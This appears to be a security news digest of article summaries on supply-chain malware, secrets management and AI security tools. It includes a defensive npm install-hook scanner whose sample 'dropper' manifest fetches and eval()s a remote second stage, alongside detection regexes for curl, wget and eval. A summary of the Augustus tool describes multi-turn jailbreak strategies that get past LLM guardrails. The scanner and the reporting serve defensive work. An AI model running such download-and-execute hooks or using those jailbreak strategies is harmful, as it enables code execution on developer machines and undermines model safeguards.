Project Glasswing: When AI Becomes the Ultimate Hacker—And Defender
The episode dives into Anthropic's secretive Project Glasswing, built around the unreleased Claude Mythos model that can autonomously discover zero‑day vulnerabilities and chain exploits. Hosts Kevin Tackett and Scott Wright debate the hype versus reality, arguing that while the AI could revolutionize defensive security, it also risks amplifying offensive threats if misused. They critique the current vulnerability‑fix pipeline, noting that finding bugs without funding fixes merely adds noise, and raise concerns about regulatory, compliance, and nation‑state implications of such powerful AI tools.
Anchore Enterprise and the DoD DevSecOps Reference Design
Anchore Enterprise has been tightly woven into the Department of Defense’s DevSecOps Reference Design, providing automated security guardrails across every stage of the software factory. By generating SBOMs, enforcing policy‑as‑code, and continuously scanning containers, Anchore stops vulnerable code before it...

XDR vs SIEM vs SOAR: What’s the Right Cybersecurity Strategy in 2026?
The article examines the evolving roles of SIEM, SOAR and XDR in 2026, emphasizing that no single tool can address modern threat landscapes alone. While SIEM provides foundational log collection and compliance, SOAR automates response workflows, and XDR delivers context‑rich,...

Workload IAM Vs. Secrets Management: A Practical Decision Guide
Most organizations begin non‑human identity security with a secrets manager, but exploding credential sprawl and the secret‑zero problem expose its limits. GitGuardian found 29 million secrets leaked on GitHub in 2025, a 34 percent rise, and Verizon still flags credential abuse as...

GlassWorm Attack Installs Fake Browser Extension for Surveillance
GlassWorm is a multi‑stage malware chain that infiltrates developers through malicious npm, PyPI or VS Code packages. After a pre‑install script runs, it contacts the Solana blockchain to fetch a second‑stage infostealer that harvests browser extensions, crypto wallet seeds, cloud and...
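The install-time hook is the foothold the summary describes: a lifecycle script that runs before the developer has looked at a single line of the package. The following is an added example, not code from the GlassWorm write-up or from any of the affected ecosystems' tooling, showing one way to triage npm manifests for that pattern. It parses `package.json`, inspects the `preinstall`/`install`/`postinstall`/`prepare` hooks, and scores each on indicators such as a remote fetch, dynamic execution and encoded payloads. The indicator regexes, the verdict thresholds and the three manifests are constructed for this illustration; a dead-drop on a blockchain RPC endpoint is just another URL to the scanner, so it is covered by the remote-fetch indicator rather than a special case.

```python
"""Flag npm lifecycle scripts that fetch and execute remote code at install time.

Added example (not GlassWorm's code, not npm's own tooling). Regexes,
thresholds and the sample manifests below are assumptions for illustration.
"""
import json
import re

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# (indicator name, pattern) pairs; each is a heuristic, not a signature.
INDICATORS = [
    ("remote_fetch", re.compile(r"(\bcurl\b|\bwget\b|\bfetch\(|https?://)", re.I)),
    ("dynamic_exec", re.compile(r"(\beval\b|new Function|child_process|\bexec\(|\bspawn\()", re.I)),
    ("inline_node", re.compile(r"\bnode\s+(-e|--eval)\b")),
    ("encoded_payload", re.compile(r"(base64|fromCharCode|\\x[0-9a-f]{2})", re.I)),
    ("hidden_output", re.compile(r"(2>\s*/dev/null|>\s*/dev/null|--silent)")),
]


def scan_manifest(manifest_json: str) -> dict:
    """Return {hook: [indicator names]} for each lifecycle hook that trips an indicator."""
    manifest = json.loads(manifest_json)
    scripts = manifest.get("scripts", {})
    findings = {}
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        hits = [name for name, rx in INDICATORS if rx.search(cmd)]
        if hits:
            findings[hook] = hits
    return findings


def verdict(manifest_json: str) -> str:
    """'block' when a hook both fetches remote content and executes code,
    'review' for any other indicator hit, 'allow' when hooks are clean."""
    findings = scan_manifest(manifest_json)
    for hits in findings.values():
        if "remote_fetch" in hits and ("dynamic_exec" in hits or "inline_node" in hits):
            return "block"
    return "review" if findings else "allow"


# Constructed sample manifests (not real packages).
BENIGN_MANIFEST = json.dumps({
    "name": "example-native-addon",
    "scripts": {"test": "jest", "postinstall": "node ./scripts/build-native.js"},
})

# Downloads a binary at install time but does not execute it in the hook: worth a look.
DOWNLOAD_ONLY_MANIFEST = json.dumps({
    "name": "example-prebuilt",
    "scripts": {"postinstall": "curl --silent https://example.invalid/prebuilt.tgz -o vendor.tgz"},
})

# Fetches a second stage over HTTPS and eval()s it inside an inline node -e script.
MALICIOUS_MANIFEST = json.dumps({
    "name": "example-dropper",
    "scripts": {
        "preinstall": "node -e \"require('https').get('https://example.invalid/stage2',"
                      "r=>{let d='';r.on('data',c=>d+=c);r.on('end',()=>eval(d))})\"",
    },
})

if __name__ == "__main__":
    for label, m in [("benign", BENIGN_MANIFEST), ("download-only", DOWNLOAD_ONLY_MANIFEST),
                     ("dropper", MALICIOUS_MANIFEST)]:
        print(f"{label:14s} {verdict(m):7s} {scan_manifest(m)}")
```

Run it against a directory of `node_modules/*/package.json` before `npm ci` on a build host, or wire the `block` verdict into a policy gate; `npm ci --ignore-scripts` remains the simpler control where the build can live without lifecycle hooks.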

Azure APIM Signup Bypass: 97.9% of Developer Portals Still Exploitable Anonymously and From the Internet
A critical Azure API Management (APIM) flaw lets attackers bypass the "disable signup" toggle and create accounts anonymously. Praetorian’s research shows 97.9% of internet‑facing Developer Portals still accept signup requests, exposing valid API keys and backend data. The vulnerability stems...

Secrets Management Vs. Secrets Elimination: Where Should You Invest?
Enterprises are weighing two divergent authentication philosophies: traditional secrets management, which safeguards static credentials in vaults, and secretless authentication, which eliminates static secrets by issuing short‑lived tokens tied to workload identities. While secretless reduces attack surface and operational friction for...
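Both this summary and the workload IAM decision guide above turn on the same distinction: a vaulted static credential is valid for anyone who holds it, anywhere, until someone rotates it, whereas a secretless design hands the workload a token bound to its identity and a target audience that expires on its own. The block below is an added example written for this page, not code from either article or from any identity product. It implements the token side in miniature: an issuer signs claims (`sub`, `aud`, `exp`) with a key the workload never sees, and a relying service rejects anything with a bad signature, the wrong audience or a lapsed expiry. The issuer key, workload names, TTL and timestamps are assumptions for the illustration; a real deployment would use the platform's identity token (OIDC or similar) and asymmetric signatures rather than a shared HMAC key.

```python
"""Short-lived workload-identity tokens versus a static secret: added example.

Not code from either article. Issuer key, workload names and TTL are
assumptions; a shared HMAC key stands in for the issuer's signing key.
"""
import base64
import hashlib
import hmac
import json
import time

ISSUER_KEY = b"issuer-signing-key-held-only-by-the-token-service"  # assumption
TOKEN_TTL_SECONDS = 300  # assumption: five-minute tokens

# The "before" picture: one long-lived key, checked with no notion of who or when.
STATIC_API_KEY = "sk_live_example_static_key"  # constructed placeholder


def check_static_key(presented: str) -> bool:
    """A vaulted static secret: valid for any caller, any target, until rotated."""
    return hmac.compare_digest(presented, STATIC_API_KEY)


def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _unb64(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def mint_token(workload_id: str, audience: str, now=None, ttl=TOKEN_TTL_SECONDS) -> str:
    """Token service: bind claims to one workload identity and one audience, then sign."""
    now = int(time.time()) if now is None else now
    claims = {"sub": workload_id, "aud": audience, "iat": now, "exp": now + ttl}
    body = _b64(json.dumps(claims, sort_keys=True).encode())
    sig = hmac.new(ISSUER_KEY, body.encode(), hashlib.sha256).digest()
    return body + "." + _b64(sig)


def verify_token(token: str, expected_audience: str, now=None):
    """Relying service: return (claims, 'ok') or (None, reason). Signature is
    checked before any claim is trusted, and expiry is compared to the caller's clock."""
    now = int(time.time()) if now is None else now
    parts = token.split(".")
    if len(parts) != 2:
        return None, "malformed"
    body, sig = parts
    expected = hmac.new(ISSUER_KEY, body.encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _unb64(sig)):
        return None, "bad signature"
    claims = json.loads(_unb64(body))
    if claims.get("aud") != expected_audience:
        return None, "wrong audience"
    if now >= claims.get("exp", 0):
        return None, "expired"
    return claims, "ok"


if __name__ == "__main__":
    t0 = 1_000_000  # constructed clock
    tok = mint_token("payments-svc", "billing-api", now=t0)
    print("fresh, right audience:", verify_token(tok, "billing-api", now=t0 + 100)[1])
    print("replayed at another service:", verify_token(tok, "inventory-api", now=t0 + 100)[1])
    print("replayed after TTL:", verify_token(tok, "billing-api", now=t0 + 400)[1])
    print("static key, any caller, any time:", check_static_key(STATIC_API_KEY))
```

The contrast worth noticing is in the failure modes: a leaked `STATIC_API_KEY` is usable until it is rotated, while a leaked token is useless at any other audience and dies within the TTL, which is the "reduced attack surface" the summary refers to. The secret-zero problem does not vanish, it moves to how the workload proves its identity to the issuer, which is why the platform's attested identity rather than another stored credential should be what bootstraps `mint_token`.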

Augustus v0.0.9: Multi-Turn Attacks for LLMs That Fight Back
Augustus v0.0.9 adds a unified engine for multi‑turn LLM attacks, offering four distinct strategies—Crescendo, GOAT, Hydra, and Mischievous User. The tool demonstrates that conversational context can bypass modern guardrails, extracting step‑by‑step instructions from GPT‑4o‑mini in as few as two turns. Hydra’s back‑tracking...

Mapping the Unknown: Introducing Pius for Organizational Asset Discovery
Praetorian has released Pius, an open‑source Go binary that consolidates asset discovery across five Regional Internet Registries, Certificate Transparency logs, and more than 20 intelligence sources. The tool normalizes data, assigns confidence scores, and outputs results in formats ready for...

There’s Always Something: Secrets Detection at Engagement Scale with Titus
Praetorian released Titus, an open‑source secret scanner built in Go that runs as a CLI, library, Burp Suite, or Chrome extension. It inherits Nosey Parker’s 450+ detection rules and adds binary file extraction and a validation framework that confirms whether...